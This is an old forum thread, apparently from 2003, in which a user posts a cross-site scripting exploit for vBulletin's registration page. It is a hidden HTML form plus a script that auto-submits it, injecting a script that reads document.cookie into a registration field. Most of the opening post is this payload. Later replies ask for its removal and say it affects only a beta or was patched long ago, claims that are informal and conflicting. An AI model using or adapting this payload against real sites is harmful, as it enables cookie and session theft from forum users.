media forums gallery e-zine topsite services faq about us
Bored? Come in and play at Jusunlee.com Arcade! Go chat in Jusunlee.com Chatroom (requires AIM) Here you can view your subscribed threads, work with private messages and edit your profile and preferences Registration is free! Calendar Find other members Frequently Asked Questions Search Home
Jusunlee.com Forums > Interests > Technology > Vbulletin Exploit
  Last Thread   Next Thread
Author
Thread Post New Thread    Post A Reply
700B501337
d0 j00 5p34|< 1337?

Registered: Dec 2003
Location: w00t
Posts: 36
Status: Offline
Vbulletin Exploit

an attacket can inject html with this:


[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<> )


be careful

__________________

Report this post to a moderator | IP: Logged
Old Post 12-08-2003 09:17 PM
Click Here to See the Profile for 700B501337 Find more posts by 700B501337 Add 700B501337 to your buddy list Edit/Delete Message Reply w/Quote
kryogenix
Ghost

Registered: Nov 2002
Location: In your hard drive
Posts: 1921
Status: Offline

remove this please before people get ideas

Report this post to a moderator | IP: Logged
Old Post 12-08-2003 09:34 PM
Click Here to See the Profile for kryogenix Click here to Send kryogenix a Private Message Find more posts by kryogenix Add kryogenix to your buddy list Edit/Delete Message Reply w/Quote
700B501337
d0 j00 5p34|< 1337?

Registered: Dec 2003
Location: w00t
Posts: 36
Status: Offline

quote:
Originally posted by kryogenix
remove this please before people get ideas


no, i don't mean it that way, i'm just saying, it's possible so watch out, people can steal your password like that romeo guy in random thoughts

__________________

Report this post to a moderator | IP: Logged
Old Post 12-08-2003 09:37 PM
Click Here to See the Profile for 700B501337 Find more posts by 700B501337 Add 700B501337 to your buddy list Edit/Delete Message Reply w/Quote
kiggaplease
Senior Member

Registered: Jun 2002
Location: land of the free
Posts: 827
Status: Offline

this is for vB 3.0 beta, anyway

Report this post to a moderator | IP: Logged
Old Post 12-08-2003 10:20 PM
Click Here to See the Profile for kiggaplease Click here to Send kiggaplease a Private Message Find more posts by kiggaplease Add kiggaplease to your buddy list Edit/Delete Message Reply w/Quote
micron
all i need is a miracle

Registered: Mar 2002
Location:
Posts: 1486
Status: Offline

xss injection vulnerabilities has been addressed since vb2.2.9..

Report this post to a moderator | IP: Logged
Old Post 12-10-2003 02:31 AM
Click Here to See the Profile for micron Click here to Send micron a Private Message Find more posts by micron Add micron to your buddy list Edit/Delete Message Reply w/Quote
All times are GMT. The time now is 07:45 PM. Post New Thread    Post A Reply
  Last Thread   Next Thread

Show Printable Version Email this Page Subscribe to this Thread

Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts 		HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
 
©2003 Jusunlee.com. All rights reserved. Powered by vBulletin.